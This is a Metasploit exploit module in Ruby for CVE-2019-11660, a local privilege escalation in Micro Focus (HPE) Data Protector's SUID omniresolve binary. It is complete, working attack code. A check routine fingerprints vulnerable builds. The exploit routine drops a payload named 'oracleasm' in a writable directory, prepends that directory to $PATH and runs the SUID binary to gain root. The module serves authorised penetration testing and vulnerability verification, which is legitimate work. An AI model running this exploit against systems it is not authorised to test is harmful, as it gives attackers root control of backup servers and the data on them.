##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  # Local privilege escalation for CVE-2019-11660 (see 'References').
  # `omniresolve` is a SUID binary that resolves `oracleasm` through the
  # inherited `$PATH`, so a writable directory placed at the front of
  # `$PATH` wins that lookup. `check` fingerprints the installed build from
  # `omniresolve -ver`; `exploit` drops two files in WritableDir (both
  # registered with FileDropper for cleanup) and runs the SUID binary with
  # `$PATH` prefixed by that directory.
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  # Runs `check` ahead of `exploit` (AutoCheck mixin).
  prepend Msf::Exploit::Remote::AutoCheck

  # Registers module metadata and options.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
        'Description' => %q{
          This module exploits the trusted `$PATH` environment
          variable of the SUID binary `omniresolve` in
          Micro Focus (HPE) Data Protector A.10.40 and prior.

          The `omniresolve` executable calls the `oracleasm` binary using
          a relative path and the trusted environment `$PATH`, which allows
          an attacker to execute a custom binary with `root` privileges.

          This module has been successfully tested on:
          HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;
          Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)

          The vulnerability has been patched in:
          Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
        },
        'License' => MSF_LICENSE,
        'Author' => [
          's7u55', # Discovery and Metasploit module
        ],
        'DisclosureDate' => '2019-09-13',
        'Platform' => [ 'linux' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [
          [
            'Micro Focus (HPE) Data Protector <= 10.40 build 118',
            # upper_version is read by `check`; the build cut-off (118) is
            # hard-coded there rather than carried in the target hash.
            { upper_version: Rex::Version.new('10.40') }
          ]
        ],
        'DefaultOptions' => {
          'PrependSetgid' => true,
          'PrependSetuid' => true
        },
        'References' => [
          [ 'CVE', '2019-11660' ],
          [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]
        ],
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ],
          # Two files are written to WritableDir; both are registered for cleanup.
          'SideEffects' => [ARTIFACTS_ON_DISK]
        },
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])
      ]
    )

    register_advanced_options(
      [
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
      ]
    )
  end

  # @return [String] the WritableDir option, coerced to a string
  def base_dir
    datastore['WritableDir'].to_s
  end

  # @return [String] the SUID_PATH option, coerced to a string
  def suid_bin_path
    datastore['SUID_PATH'].to_s
  end

  # Determines whether the configured SUID binary looks vulnerable.
  #
  # Requires the file to exist and be setuid, then parses the version and
  # build number out of `omniresolve -ver` output.
  #
  # @return [CheckCode] Safe when the file is missing, not setuid, or the
  #   parsed version/build is past the vulnerable range; Appears when the
  #   parsed version is below upper_version, or equals it with build <= 118;
  #   Detected when the `-ver` output cannot be parsed.
  def check
    return CheckCode::Safe("#{suid_bin_path} file not found") unless file? suid_bin_path
    return CheckCode::Safe("#{suid_bin_path} is not setuid") unless setuid? suid_bin_path

    info = cmd_exec("#{suid_bin_path} -ver").to_s
    # Group 1: "NN.NN" version preceded by a letter and a dot (e.g. "A.10.40");
    # group 3: three-digit build following "build ". Group 2 is filler.
    if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
      # Round-trip through Float so a leading zero ("09.07" -> "9.07") is
      # dropped before constructing a Rex::Version.
      version = '%.2f' % ::Regexp.last_match(1).to_f
      build = ::Regexp.last_match(3).to_i
      vprint_status("omniresolve version #{version} build #{build}")

      # Vulnerable range: anything below upper_version, or exactly
      # upper_version up to build 118 (the fix ships in build 125 of 10.40
      # per the Description).
      unless Rex::Version.new(version) < target[:upper_version] ||
             (Rex::Version.new(version) == target[:upper_version] && build <= 118)
        return CheckCode::Safe
      end

      return CheckCode::Appears
    end

    # Binary is present and setuid but the version string was not recognised.
    vprint_error('Could not parse omniresolve -ver output')
    CheckCode::Detected
  end

  # Stages the payload and triggers the `$PATH` lookup.
  #
  # Drops the payload as `oracleasm` in WritableDir, writes a small random
  # trigger file, then invokes the SUID binary with WritableDir prefixed to
  # `$PATH`. Both dropped files are registered with FileDropper for cleanup.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the session is already
  #   root (unless ForceExploit is set) or WritableDir is not writable
  def exploit
    if !datastore['ForceExploit'] && is_root?
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
    end

    unless writable?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    # The file name must be exactly `oracleasm`: that is the relative name
    # the SUID binary resolves through `$PATH`.
    payload_path = File.join(base_dir, 'oracleasm')
    register_file_for_cleanup(payload_path)
    write_file(payload_path, generate_payload_exe)
    chmod(payload_path) # mixin default mode; assumed to set the execute bit — confirm

    # Random file name and `x:y` content handed to `-i`; what omniresolve
    # does with it is not documented here.
    trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
    register_file_for_cleanup(trigger_path)
    write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
    # Backgrounded (`&`) so cmd_exec returns once the binary is launched;
    # the trailing `echo` gives the shell something to print.
    cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ")
  end
end